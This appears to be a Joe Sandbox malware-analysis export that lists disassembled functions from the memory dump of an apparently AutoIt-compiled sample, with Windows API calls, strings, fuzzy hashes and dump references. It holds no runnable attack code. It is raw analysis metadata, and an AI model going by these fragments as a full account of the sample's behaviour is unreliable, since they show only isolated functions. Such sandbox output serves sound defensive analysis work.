Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 084ad54d3dd5ffa97139dfb5c8c785ca0628f3d4707e2f34e8aafa66c110c918
Instruction ID: 514e6e687b5b7db6bc75d6de5fdbcc9b59f0178d2bb0375091a2081f003f68e5
Opcode Fuzzy Hash: 084ad54d3dd5ffa97139dfb5c8c785ca0628f3d4707e2f34e8aafa66c110c918
Instruction Fuzzy Hash: D15136714087449BD320AF11DC86BBFBBF8FB84300F81889DF5D9811A5EBB08529CB66

Function 00C35745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 00C357E0
_wcslen.LIBCMT ref: 00C357EC

Strings

CALLARGARRAY, xrefs: 00C357E6, 00C357EB

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY
API String ID: 157775604-1150593374
Opcode ID: 2274676aa471bf4990ce3663ad376c324af40b2f2affa2711370e0bb74c74dd5
Instruction ID: 7d05c9b5f104fab559fc9682d37598c6ea103f945dc4b94d9f15c7c618f6d605
Opcode Fuzzy Hash: 2274676aa471bf4990ce3663ad376c324af40b2f2affa2711370e0bb74c74dd5
Instruction Fuzzy Hash: 4141AE71E102099FCB14DFA9C8819FEBBF5FF59324F104069E515A7291E7709E81CBA1

Function 00C2D0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00C2D130
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00C2D13A

Strings

|, xrefs: 00C2D10B

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: CrackInternet_wcslen
String ID: |
API String ID: 596671847-2343686810
Opcode ID: 3ff4a3232ad208a14e4b0ae139563545f0da11ab252b271f02b529ae9c38c7d5
Instruction ID: 0ad99329d1f9e6b25d85f8ad6b833f68fa3a0d4c454f6e2ee57f9aa7d609106b
Opcode Fuzzy Hash: 3ff4a3232ad208a14e4b0ae139563545f0da11ab252b271f02b529ae9c38c7d5
Instruction Fuzzy Hash: 48313E71D00219AFCF15EFA5DC85AEEBFB9FF14310F100059F815A61A2E775AA16CB50

Function 00C4356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00C43621
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00C4365C

Strings

static, xrefs: 00C435BC

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: d58fa3bad0741fd8b40f91866271a5e9e1035ca2a98fbad2dfbb243ffa83c98e
Instruction ID: 4f3ca883191252a88b3cca49f7897d2d7086402485b60a455051ec077bff370d
Opcode Fuzzy Hash: d58fa3bad0741fd8b40f91866271a5e9e1035ca2a98fbad2dfbb243ffa83c98e
Instruction Fuzzy Hash: B7319C71110244AEDB10DF28DC81FFB73A9FF88720F018619F9A597290DA30AE91D764

Function 00C44537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 00C4461F
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00C44634

Strings

', xrefs: 00C4458E

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 0ec94ad12c2cf02d55f87ffc73aed75b79173f30864292cf6aa57ab8fe0b9c31
Instruction ID: 5f1bd13fadaae44facee4a6e8fb872ac503e65f7f57c5c1ea1de159fe26efadf
Opcode Fuzzy Hash: 0ec94ad12c2cf02d55f87ffc73aed75b79173f30864292cf6aa57ab8fe0b9c31
Instruction Fuzzy Hash: DE3118B4A012099FDF18CFA9C991BDABBF5FF49300F25406AE915AB351D770AA41CF90

Function 00C431EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00C4327C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C43287

Strings

Combobox, xrefs: 00C43249

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 5d3498ffea18820cb1060f3320ff35064f5cd467056bfdbec63505c83e237d6d
Instruction ID: 8e669c8b189c0848e7eea57eda35030b7d50e10e7aa8987ffc43a72cd26a54eb
Opcode Fuzzy Hash: 5d3498ffea18820cb1060f3320ff35064f5cd467056bfdbec63505c83e237d6d
Instruction Fuzzy Hash: 8511B2713002487FFF259E54DC81FBB37AAFB943A4F104225F92897292D6B19E518760

Function 00C1EF10 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 70COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00C1EF1D

Strings

HANDLE, xrefs: 00C1EF16
h, xrefs: 00C1EF1B

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: _wcslen
String ID: HANDLE$h
API String ID: 176396367-1204507627
Opcode ID: 48deb52f5dcb1a1ec2d68bc8dc9d77364c80f45fa2f2292cbd0477775692746a
Instruction ID: 84ac7b11544efbf482b662d40248536cb2456684061cc12b571c56acec4903d4
Opcode Fuzzy Hash: 48deb52f5dcb1a1ec2d68bc8dc9d77364c80f45fa2f2292cbd0477775692746a
Instruction Fuzzy Hash: 3D11E1715101249AE7188F99D889BEDB3A8DF82721F60406AEC11CE0C4E7709EC2E714

Function 00C43710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00BB600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00BB604C
Part of subcall function 00BB600E: GetStockObject.GDI32(00000011), ref: 00BB6060
Part of subcall function 00BB600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00BB606A

GetWindowRect.USER32(00000000,?), ref: 00C4377A
GetSysColor.USER32(00000012), ref: 00C43794

Strings

static, xrefs: 00C43757

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: f750b88ecff3f435d23cd98f04389aed47929d19e8b68b12193876a268165ce7
Instruction ID: 6dbc5cecc09520e35662922ee563d3760d78f978600d99d5bbf821d8b5dfba62
Opcode Fuzzy Hash: f750b88ecff3f435d23cd98f04389aed47929d19e8b68b12193876a268165ce7
Instruction Fuzzy Hash: 731159B2610209AFDB00DFA8CC46AEE7BF8FB09304F004514FDA5E2250D735E9119B50

Function 00C2CD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00C2CD7D
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00C2CDA6

Strings

<local>, xrefs: 00C2CD66

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 79ce6d437c14d93c67f6c0054f825e6d382d071331c3dae361ac503be3760a15
Instruction ID: 62a8c2ceb6c975efbd8d8408997e2e86937eba5bc519a92bc0661ee5863ef34e
Opcode Fuzzy Hash: 79ce6d437c14d93c67f6c0054f825e6d382d071331c3dae361ac503be3760a15
Instruction Fuzzy Hash: 50110675201A317AD7344B669CC4FEBBE6CEF127A4F004236F11983480D3709944D6F0

Function 00C43429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00C434AB
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00C434BA

Strings

edit, xrefs: 00C4348F

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 6a7974869979fff587a0ae9be4df0d6f9c7111d2549861ec69371dd8a0ad8626
Instruction ID: 4a94f5f492bd27189af10ea2b1826f055d4eb7610178ea805c4c3c42849fe779
Opcode Fuzzy Hash: 6a7974869979fff587a0ae9be4df0d6f9c7111d2549861ec69371dd8a0ad8626
Instruction Fuzzy Hash: 4C119A71200248ABEB129E64DC84BEA3BAAFB95374F505324F970931E0C775DE519B60

Function 00C16C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00BB9CB3: _wcslen.LIBCMT ref: 00BB9CBD

CharUpperBuffW.USER32(?,?,?), ref: 00C16CB6
_wcslen.LIBCMT ref: 00C16CC2

Strings

STOP, xrefs: 00C16CBC, 00C16CC1

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: d8314506fa23281a0c870e5a5b55a2f74e143ff78427289ecc310334961569d9
Instruction ID: 4909725e18d2b1b9230b700026409f334d43f1f4482136ab0c31368589052d5f
Opcode Fuzzy Hash: d8314506fa23281a0c870e5a5b55a2f74e143ff78427289ecc310334961569d9
Instruction Fuzzy Hash: 9A01D232A105268BCB20AFFDDC909FF77F5FB627107500968E86297190EB71DA80D790

Function 00C11CDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB9CB3: _wcslen.LIBCMT ref: 00BB9CBD

Part of subcall function 00C13CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00C13CCA

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00C11D4C

Strings

ComboBox, xrefs: 00C11CEB
ListBox, xrefs: 00C11D16

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: ea612ef2b162a56d4b803e91cd2917022e58dfea966af8b92eb601a70654efa6
Instruction ID: ef7c970dbcfa858b4ac0fa49180df78cb7e49c95c25169d82a698c3d2e6e635b
Opcode Fuzzy Hash: ea612ef2b162a56d4b803e91cd2917022e58dfea966af8b92eb601a70654efa6
Instruction Fuzzy Hash: 96012431601218AB8B09FBA0DC51DFE77A8FB03390B180619FD32673C1EA745948E660

Function 00C11BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB9CB3: _wcslen.LIBCMT ref: 00BB9CBD

Part of subcall function 00C13CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00C13CCA

SendMessageW.USER32(?,00000180,00000000,?), ref: 00C11C46

Strings

ComboBox, xrefs: 00C11BE5
ListBox, xrefs: 00C11C10

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: bf955fa3c6a7829f165f82344a3c99749c1b2b61616aadc80d6f232d95d44328
Instruction ID: be50def9aaef11c6ac4eaaec56d496186d9c21161beee2cce946b03066a0eb5a
Opcode Fuzzy Hash: bf955fa3c6a7829f165f82344a3c99749c1b2b61616aadc80d6f232d95d44328
Instruction Fuzzy Hash: E9016775781108A7CB14EB90CD61AFF77E89B17380F140059BA1667281EA649F48A6F1

Function 00C11C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB9CB3: _wcslen.LIBCMT ref: 00BB9CBD

Part of subcall function 00C13CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00C13CCA

SendMessageW.USER32(?,00000182,?,00000000), ref: 00C11CC8

Strings

ComboBox, xrefs: 00C11C69
ListBox, xrefs: 00C11C94

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: abd8df7945d843cb3f01baa0d4765bf1b54cf123926c2ab26c24e2de21520902
Instruction ID: 084225848196a269ce30194a5351de3d639daf60aed9e4399d9bc8986cd11049
Opcode Fuzzy Hash: abd8df7945d843cb3f01baa0d4765bf1b54cf123926c2ab26c24e2de21520902
Instruction Fuzzy Hash: BC01D67568111867CF04EBA4CE61AFF77E89B13380F180015BE0673281EAA49F48E6F1

Function 00C11D68 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB9CB3: _wcslen.LIBCMT ref: 00BB9CBD

Part of subcall function 00C13CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00C13CCA

SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00C11DD3

Strings

ComboBox, xrefs: 00C11D75
ListBox, xrefs: 00C11DA0

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: e5bf1601768716205b61b091628a2883877da7c849ef483449152ce596bda818
Instruction ID: 77004bdd7cceb02d42714496ee561f293db7a26d9b45b970732d613640ba7142
Opcode Fuzzy Hash: e5bf1601768716205b61b091628a2883877da7c849ef483449152ce596bda818
Instruction Fuzzy Hash: 25F0CD71B5121867DB05F7A4DC91FFF77B8AB03390F140915BD26632C1EAA45A489260

Function 00C3747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00C37493
_wcslen.LIBCMT ref: 00C374B9

Strings

3, 3, 16, 1, xrefs: 00C37483

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: _wcslen
String ID: 3, 3, 16, 1
API String ID: 176396367-3042988571
Opcode ID: d6c88c031454d335d2e771bf14c4d0c60dc2657807902aa920471cf88546536d
Instruction ID: 2a7ec669c8fd5dbca7ed4033ffa0efcd8899a20a7a48b6c04757f7fccd2e1485
Opcode Fuzzy Hash: d6c88c031454d335d2e771bf14c4d0c60dc2657807902aa920471cf88546536d
Instruction Fuzzy Hash: 8BE06182324320259331237BDCC197F96C9CFC9790B10192BF9C5C2366FBA8DE9193A0

Function 00C10B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00C10B23

Strings

AutoIt, xrefs: 00C10B17
Error allocating memory., xrefs: 00C10B1C

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: f72c55fd62f83b8f28be6c790a6cdfa453f9c72e0064c423079f96235533aa9e
Instruction ID: ca91d0ffd2ea7e17d9aa1944f2106169f79967a746c8f890e1ed39d9cb2136d3
Opcode Fuzzy Hash: f72c55fd62f83b8f28be6c790a6cdfa453f9c72e0064c423079f96235533aa9e
Instruction Fuzzy Hash: 95E0D83128531937D21437957C43FD97BC49F05B21F1044BAFB98555D38AE1289006E9

Function 00BD0D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00BCF7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00BD0D71,?,?,?,00BB100A), ref: 00BCF7CE

IsDebuggerPresent.KERNEL32(?,?,?,00BB100A), ref: 00BD0D75
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00BB100A), ref: 00BD0D84

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00BD0D7F

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: 1ccdb2b4fda3eba2a99c31c92f637e49cb15f66da0f3a55735cd8a17ec361939
Instruction ID: c728d31762f6a5507f284d0c8d8c744a7f520614dc2a0617e5850e40e426fc77
Opcode Fuzzy Hash: 1ccdb2b4fda3eba2a99c31c92f637e49cb15f66da0f3a55735cd8a17ec361939
Instruction Fuzzy Hash: 93E06DB42003018BD770AFB9E444756BBE5BB04741F0089BEE882C6761EBF4E4458BA1

Function 00C0D21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00C0D220

Strings

X64, xrefs: 00C0D2A8
%.3d, xrefs: 00C0D22B

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

